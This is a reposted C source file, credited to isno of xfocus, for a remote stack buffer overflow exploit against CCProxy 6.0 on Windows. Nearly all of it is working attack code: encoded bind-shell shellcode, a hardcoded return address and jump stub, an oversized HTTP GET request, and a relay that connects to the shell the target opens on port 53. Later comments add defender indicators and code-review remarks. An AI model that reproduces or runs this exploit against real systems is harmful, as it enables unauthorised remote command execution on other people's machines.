CCproxy 6 Exploit CN Version

王朝other·作者佚名  2006-01-09

/*

* ccpx.c - x86/win32 CCProxy 6.0 remote stack buffer overflow exploit

* Author : isno <isno@xfocus.org>

* Compile : cl ccpx.c

* Usage : ccpx <target_ip> [target_port]

* default target_port is 808

* Stronger By Goldsun 5261314@sohu.com

*/

#include <stdio.h>

#include <stdlib.h>

#include <Winsock2.h>

#include <windows.h>

#pragma comment (lib,"ws2_32")

#define PPORT 808

#define XPORT 53

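// Payload credited to "lion": a bind shell that main() expects to find
// listening on TCP port XPORT (53) of the target after the request is sent.
// Defender note: a new TCP listener on port 53 on a host running the proxy,
// owned by the proxy process, is a post-compromise indicator worth alerting on.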

unsigned char shellcode[] =

"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA"

"\xEB\x05\xE8\xEB\xFF\xFF\xFF"

// shellcode

"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"

"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"

"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"

"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"

"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"

"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"

"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0"

"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"

"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B"

"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x99\xAC\xAA\x59\x10\xDE\x9D"

"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA"

"\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10"

"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF"

"\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8"

"\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79"

"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59"

"\x35" //port

"\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59"

"\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD"

"\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC"

"\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5"

"\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6"

"\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0"

"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED"

"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";

int Make_Connection(char *address,int port,int timeout);

void shell (int sock);

/*
 * Entry point. Sends a single oversized HTTP GET request to a CCProxy
 * listener and then connects to the port the payload is expected to open.
 *
 * Steps, as written below:
 *   1. Parse <target_ip> [target_port] [offset]; the port defaults to PPORT.
 *   2. Start Winsock and look up the local host name / IP (display only).
 *   3. Ask the operator two y/n questions and pick a value for offset.
 *   4. Connect to the target with Make_Connection() (10 second timeout).
 *   5. Build buf: filler bytes, payload, 4-byte return value, 12-byte stub,
 *      and wrap it as the path of "GET /<buf> HTTP/1.0".
 *   6. Send the request, wait one second, connect to XPORT and hand the
 *      socket to shell().
 *
 * Defender notes (derived from the code in this function):
 *   - On the wire this is one HTTP/1.0 GET to the proxy port whose path is
 *     more than 4000 bytes, almost all of them 0x41 ('A'). A request-line
 *     length limit in front of the proxy, or an IDS rule on over-long
 *     request paths to this port, covers it.
 *   - It is followed about a second later by a TCP connection from the same
 *     client to port XPORT (53) on the proxy host. TCP/53 inbound to a
 *     machine that is not a DNS server is a useful correlation point.
 *   - The header of this file names CCProxy 6.0 as the affected build; the
 *     fixed version is not stated on this page. Restrict who can reach the
 *     proxy port and replace the affected build.
 *
 * Returns 1 on a usage error, 0 after shell() returns; other failures call
 * exit(1).
 */
int main(int argc, char * argv[])
{
    SOCKET csock, s2;
    WSADATA WSAData;
    int yn, offset, ret, pport;
    char line[80];
    char buf[8000], sbuf[10000];
    char local[100] = {0};
    char *localip;
    struct hostent * pHost;

    /* No target given: print the banner and usage, then stop. */
    if(argc<2)
    {
        printf("CCPROXY 6 Exploit CN Writen By isno@xfocus.org & Compiled By Goldsun\n");
        printf("Usage: %s <target_ip> [target_port] [offset]\ndefault port is 808\n", argv[0]);
        return 1;
    }

    /* Optional second argument overrides the default proxy port. */
    if(argc>=3)
        pport=atoi(argv[2]);
    else
        pport=PPORT;

    /* Optional third argument is parsed into offset; offset is assigned
     * again further down. */
    if(argc>=4)offset=atoi(argv[3]);

    /* Initialise Winsock, requesting version 1.1. */
    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
    {
        printf("[-] WSAStartup failed.\n");
        WSACleanup();
        exit(1);
    }

    // Get the local host name
    gethostname((char*)local, sizeof(local)-1);

    // Get the local IP address
    pHost = gethostbyname((char*)local);
    // NOTE(review): pHost is dereferenced without a NULL check;
    // gethostbyname() returns NULL when the lookup fails.
    localip = inet_ntoa(*(IN_ADDR *)pHost->h_addr_list[0]);

    //offset=15-strlen(localip); //offset from target_ip len ret addr
    offset=2;

    printf("Local IP: %s Target IP: %s:%d\n",localip,argv[1],pport);
    printf("Target in the same subnet? [y/n] ");
    yn = _getch();

    /* 0x6e / 0x4e are 'n' / 'N'. */
    if(yn == 0x6e || yn == 0x4e)
    {
        printf("\r\nHave real Internet Ip Address ? [y/n] ");
        yn = _getch();
        if(yn == 0x6e || yn == 0x4e)
        {
            printf("\r\nYour gateway Internet ip address: ");
            // NOTE(review): gets() does no bounds checking on line[80];
            // fgets(line, sizeof line, stdin) is the bounded alternative.
            gets(line);
            offset=15-strlen(line);
        }
    }

    // If the target is a local address, offset needs to be adjusted
    if(strcmp(argv[1], "localhost") == 0 || strcmp(argv[1], "127.0.0.1") == 0)
        //offset=15-strlen("127.0.0.1");
        offset=6;

    printf("\r\n[+] connecting to %s:%d\n", argv[1], pport);
    csock = Make_Connection(argv[1], pport, 10);
    if(csock<0)
    {
        printf("[-] connect err.\n");
        exit(1);
    }

    printf("Offset: %d",offset);

    /* Zero the buffer, then lay down 4045+offset filler bytes of 0x41. */
    memset(buf, 0, sizeof(buf)-1);
    memset(buf, 0x41, 4045+offset);

    /* Overwrite the tail of the filler with the payload so that the payload
     * ends exactly where the filler ends. */
    memcpy(buf+strlen(buf)-strlen(shellcode), shellcode, strlen(shellcode));
    printf(" Magic Length: %d + 16 =",strlen(buf));

    strcat(buf, "\xcd\x54\xfa\x7f"); // 4-byte value the author labels "ret addr jmp esp"
    strcat(buf, "\xb9\x41\x41\x41\x25\xc1\xe9\x14\x2b\xe1\xff\xe4"); // 12-byte stub the author labels "jmp back"

    /* The whole buffer becomes the path component of one HTTP/1.0 GET. */
    sprintf(sbuf, "GET /%s HTTP/1.0\r\n\r\n", buf);
    printf(" buffer length: %d\n",strlen(buf));
    printf("[+] send magic buffer...\n");
    ret=send(csock, sbuf,strlen(sbuf), 0);
    if(ret<=0)
    {
        printf("[-] send err.\n");
        exit(1);
    }
    closesocket(csock);

    /* Pause one second before the second connection. */
    Sleep(1000);

    /* Second connection: same host, port XPORT, 10 second timeout. */
    printf("[+] connecting to CMD shell port...\n");
    s2 = Make_Connection(argv[1], XPORT, 10);
    if(s2<0)
    {
        printf("[-] connect err:-<maybe there's firewall\n");
        exit(1);
    }

    /* Relay between the console and the new socket until either side ends. */
    shell(s2);
    WSACleanup();
    return 0;
}

// Resolve a host name or dotted-quad string to an IPv4 address.
// The string is first tried as a numeric address with inet_addr(); only if
// that yields -1 is gethostbyname() consulted. Returns the address in the
// byte order those calls produce, or 0 when the name lookup fails.
unsigned int resolve(char *name)
{
    struct hostent *entry;
    unsigned int addr;

    addr = inet_addr(name);
    if (addr != (unsigned int)-1)
        return addr;

    entry = gethostbyname(name);
    if (!entry)
        return 0;

    // Copy the first four bytes of the first address in the host entry.
    memcpy(&addr, entry->h_addr, 4);
    return addr;
}

// Open a TCP connection with a connect timeout.
// Parameters:
//   char *address   host name or IP address (passed to resolve())
//   int   port      TCP port, host byte order
//   int   timeout   seconds to wait for the connection to complete
// Returns:
//   the connected socket on success
//   -1 socket() failed, -2 address did not resolve, -3 select() error,
//   -4 timed out, -5 SO_ERROR reported a failure
int Make_Connection(char *address,int port,int timeout)
{
    struct sockaddr_in target;
    struct timeval tv;
    fd_set wd;
    SOCKET s;
    DWORD bf = 1;
    int i;
    int rc;

    s = socket(AF_INET, SOCK_STREAM, 0);
    // NOTE(review): on Winsock SOCKET is an unsigned type and failure is
    // reported as INVALID_SOCKET, so this comparison likely never fires.
    if (s < 0)
        return -1;

    target.sin_family = AF_INET;
    target.sin_addr.s_addr = resolve(address);
    if (target.sin_addr.s_addr == 0) {
        rc = -2;
        goto fail;
    }
    target.sin_port = htons(port);

    // Switch to non-blocking mode (bf == 1) so connect() returns at once
    // and select() can enforce the timeout.
    ioctlsocket(s, FIONBIO, &bf);

    tv.tv_sec = timeout;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s, &wd);

    connect(s, (struct sockaddr *)&target, sizeof(target));

    // Wait for the socket to become writable.
    i = select(s + 1, 0, &wd, 0, &tv);
    if (i == -1) {
        rc = -3;
        goto fail;
    }
    if (i == 0) {
        rc = -4;
        goto fail;
    }

    // Read the pending socket error into bf to see whether connect() succeeded.
    i = sizeof(int);
    getsockopt(s, SOL_SOCKET, SO_ERROR, (char *)&bf, &i);
    if (bf != 0 || i != sizeof(int)) {
        rc = -5;
        goto fail;
    }

    // bf is 0 at this point, so this puts the socket back in blocking mode.
    ioctlsocket(s, FIONBIO, &bf);
    return s;

fail:
    closesocket(s);
    return rc;
}

/* ripped from TESO code and modified by ey4s for win32 */
/*
 * Relay loop between a connected socket and the console.
 * Each pass calls select() on the socket with a timeout structure that is
 * initialised once to one second. When select() reports exactly one ready
 * descriptor, received bytes are written to descriptor 1; in every other
 * case up to 512 bytes are read from descriptor 0 and sent to the socket.
 * The function prints "[-] Connection closed." and returns as soon as any
 * of recv/write/read/send returns a value <= 0.
 */
void shell (int sock)
{
    int n;
    char chunk[512];
    struct timeval wait;
    /* Hand-built read set: element 0 is the count, element 1 the socket.
     * Presumably relies on the Winsock fd_set layout; confirm before
     * reusing elsewhere. */
    unsigned long rset[2];

    wait.tv_sec = 1;
    wait.tv_usec = 0;

    for (;;) {
        rset[0] = 1;
        rset[1] = sock;

        n = select (0, (fd_set *)&rset, NULL, NULL, &wait);
        if (n == 1) {
            /* Socket readable: socket -> console. */
            n = recv (sock, chunk, sizeof (chunk), 0);
            if (n > 0)
                n = write (1, chunk, n);
        } else {
            /* Otherwise: console -> socket. */
            n = read (0, chunk, sizeof (chunk));
            if (n > 0)
                n = send(sock, chunk, n, 0);
        }

        if (n <= 0) {
            printf("[-] Connection closed.\n");
            return;
        }
    }
}

 
 
 